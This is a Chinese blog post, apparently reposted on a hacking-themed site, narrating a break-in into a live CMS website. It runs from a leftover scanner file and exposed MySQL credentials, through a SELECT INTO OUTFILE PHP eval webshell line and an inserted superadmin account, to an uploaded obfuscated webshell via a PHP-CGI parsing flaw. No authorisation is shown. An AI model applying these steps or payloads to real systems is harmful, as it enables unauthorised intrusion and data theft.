当前位置:首页 > 黑客技术 > 正文内容

渗透测试(渗透测试是什么意思)

hacker2年前 (2022-07-27)黑客技术141

来自:信安之路(微信号:xazlsec)

作者:Damian

来自:信安之路(微信号:xazlsec)

作者:Damian

最近在做渗透测试的练习中遇到一个比较有意思的站点,在此记录下来,希望能给向我一样刚入安全圈不久的萌新提供一些基本思路吧。

在拿到目标站点的域名时,首要的工作肯定是进行一系列的信息搜集工作,具体搜集哪些信息以及怎么有效搜集,可以参考 Google 或者百度。

下面为了文章的简洁性,我只提及我会利用到的一些站点信息。

首先网站的真实 IP 并没有隐藏在 CDN 后面,直接在 ThreadBook 上查看同 IP 的旁站,显示足足 189 个!

看到这个数的时候,说实话内心是沉重的,虽然可以从众多的旁站入手,来拿到我们目标站的权限,不过运行了这么多站点的服务器,其防护措施,和权限的管理肯定都是比较安全。

简单的翻阅了一下网站的大概内容,发现网站更新使用的频率比较高,这也侧面的说明了管理员对网站的重视程度也算比较 ok 的。

发现网站的管理后台被隐藏了,一番爆破,Google haking 语法等也没找到后台目录。

好了,我们直接上漏扫看一下吧,撸主使用的是 AWVS (也可以使用其他的扫描器,如 Appscan,或者其他安全公司的一些漏扫产品等)。

经过一波扫描,并没有发现 SQL 注入或者 XSS 跨站等,不过倒是发现了一个 PHPCGI 的解析漏洞,详情:

http://www.hangge.com/blog/cache/detail_667.html

展开全文

http://www.hangge.com/blog/cache/detail_667.html

但是如果找不到文件上传的途径,那么这个漏洞也就无法利用了,看来必须得进后台啊

在尝试使用一个扫描敏感文件的小工具时,发现网站的跟目录存在这么一个文件/1.php

进去后是这样:

直觉告诉我,这个文件肯定有问题。

果不其然,这个小脚本竟然可以遍历网站所有目录及相关特征文件(这不就是后门么。。)

这里解释一些,这个文件可能是网站管理员上传到服务器去检测 WebShell 后门的(在我发现的前一个星期上传的),估计忘记删除了。

直接试试快速扫描,发现是一个检测后门特征的扫描模式。

渗透测试(渗透测试是什么意思)

直接查看代码,发现下面两个文件都是一句话后门,

具体代码如下:

难道这么轻松的就可以拿下了?

菜刀连接,发现可以连接,但是执行不了任何命令,(哭

因为该 php 文件是被正常解析的,所以可能是系统禁用了某些函数。

继续研究/1.php这个文件,尝试特征搜索 --> login

查看相关代码,了解到该网站使用EmpireCMS

也可以得到网站的管理后台了,这个好像是帝国 CMS 的默认路径,不知道扫描器为啥没给直接爆出来。。

来到管理后台,发现后台有登录次数的限制,本菜也没找到绕过的方法,遂罢。

简单看了下 Seebug 平台上,也没有新版本的相关漏洞情况

差点忘了1.php这个“后门”文件了,从搜索结果里面直接找到数据库配置文件

由于该 Web 服务器的 IP 开放了 3306 端口,尝试使用 Navicat 连接,运气不错,直接连上了。

尝试 Mysql 直接写入一句话试试,直接执行 SQL 语句

select '<?php eval($_post[‘shell’]);?>' into outfile 'e:/wwwroot2018/xxx/web/testtest.php'

select '<?php eval($_post[‘shell’]);?>' into outfile 'e:/wwwroot2018/xxx/web/testtest.php'

返回

[Err] 1045 - Access deniedfor user

[Err] 1045 - Access deniedfor user

没权限。。

查看数据库表,找到管理员用户名表,发现密码经过加密处理过了,

没办法,想要进后台,只能使用明文的密码。

根据登录后台定位相关代码文件,找到加密的函数

mmp,这个加密有点复杂啊

渗透测试(渗透测试是什么意思)

直接 copy 该函数,本地环境新建下面 php 文件,测试密码 admin 的加密输出

好了,接下来,可以直接在管理员表添加用户了,并将权限设置为最高,也就是超级管理员权限。

进入后台

由于网站存在 PHP CGI 的解析漏洞,因此我们只需上传一个 txt 文件的一句话就可以了,找到附件上传,成功上传一句话马的 txt 文件

找到上传附件模块,直接上传一句话,发现被拦截了

直接上传免杀了一句话木马文件,成功上传,截图如下

然后菜刀直接连接

http://www.xxxx.cn/d/file/p/2018-03-15/c0f6a19e6fc7881e613f6df5a2ef1bbb.txt/1.php

http://www.xxxx.cn/d/file/p/2018-03-15/c0f6a19e6fc7881e613f6df5a2ef1bbb.txt/1.php

同上面一样,菜刀可以连接,但是执行不了任何命令

重复一下上文的猜测“因为该 php 文件是可以被正常解析的,所以可能是系统禁用了某些执行的函数”

这时候想到了各种免杀了 PHP 大马,掏出上周某大佬给的 PHP 免杀大马

直接上传成功,(鼓掌

在后面加上 php 的后缀名,成功解析,拿到 Webshell

PS 简单的看了一下服务器的目录上,发现了几十家网站的源代码,管理员也太不小心了好吧。。Webshell 已删

本篇文章就到此为止,希望自己以后多多记录,多多和大家分享。

●编号581,输入编号直达本文

扫描二维码推送至手机访问。

版权声明:本文由黑客接单发布,如需转载请注明出处。

本文链接:https://therlest.com/133381.html

标签: 渗透测试
分享给朋友:

“渗透测试(渗透测试是什么意思)” 的相关文章

天猫双十一活动什么时候开始华流

以前提到双十一那都是光棍才过的节日,而现在双十一摇身一变成了全民购物狂欢节。在双十一期间以淘宝天猫为主的购物平台都会推出各种优惠活动以及满减折扣,可以算得上是全年最便宜的时候了。那么天猫双十一活动什么时候开始呢?下面就跟百思特小编来详细了解一下2020年天猫双十一开始时间吧!...

接单的黑客_可以找黑客黑美团吗

有在网络安全范畴中,猜测网络违法和歹意软件发展趋势好像现已成为了各大网络安全公司的传统了。 为了防止让咱们去阅览上百页的安全陈述,咱们专门整兼并总结了McAfee、Forrester、FiskIQ、卡巴斯基实验室【1、2、3】、WatchGuard、Nuvias、FireEye、CyberArk、F...

黑客了解,中国黑客越南网络apt,黑客网站密码破解工具

6.42 · hxxp[://]offlineearthquake[.]com/file//?id=&n=000 进程三:使命履行及实时数据剖析10.61 2019年6月19日,FireEye Endpoint Security设备上收到了缝隙检测警报。 违规应用程序被辨认为Microso...

宏观经济学价格效应 「经济学传递效应」

饮水机效应,价格效应可分解为替代效应和收入效应。通货膨胀的经济效应主要有两个方面,中提出了著名的“节约悖论,比如买切糕,1元钱买了一块切糕,2,利息和货币通论,微观经济学中的价格效应中的一个问题。 “挤出”效应,政府购买和转移支付对我们经济的影响,加剧了收入分配的不均等化进一步加剧。微观经济学,即不...

Webshell安全检测篇

0x00 依据流量的检测办法 1.概述 笔者一直在重视webshell的安全剖析,最近就这段时刻的心得体会和咱们做个共享。 webshell一般有三种检测办法: 依据流量方法 依据agent方法(本质是直接剖析webshell文件) 依据日志剖析方法 Webshell的分...

如何查询酒店开房记录?谁可以查?网上怎么查?

关于酒店开房记录,这个基本上是看不到的,只有公检法系统(主要是公安局)才能查询的。如果你真想查询,要提供相关真实的身份证明,到公安局咨询,可能需要繁琐的手续。 2014年初,网上就有过“2000W开房数据泄露”的惊爆新闻,是因众多酒店使用了浙江慧达驿站公司开发的酒店Wi-Fi管理、认证系统,而该公司...

评论列表

北槐挽鹿
2年前 (2022-07-27)

工作肯定是进行一系列的信息搜集工作,具体搜集哪些信息以及怎么有效搜集,可以参考 Google 或者百度。下面为了文章的简洁性,我只提及我会利用到的一些站点信息。首先网站的真实 IP 并没有隐藏在 CDN 后面,直接在 ThreadBook 上查看同 IP 的旁站,显

发表评论

访客

◎欢迎参与讨论,请在这里发表您的看法和观点。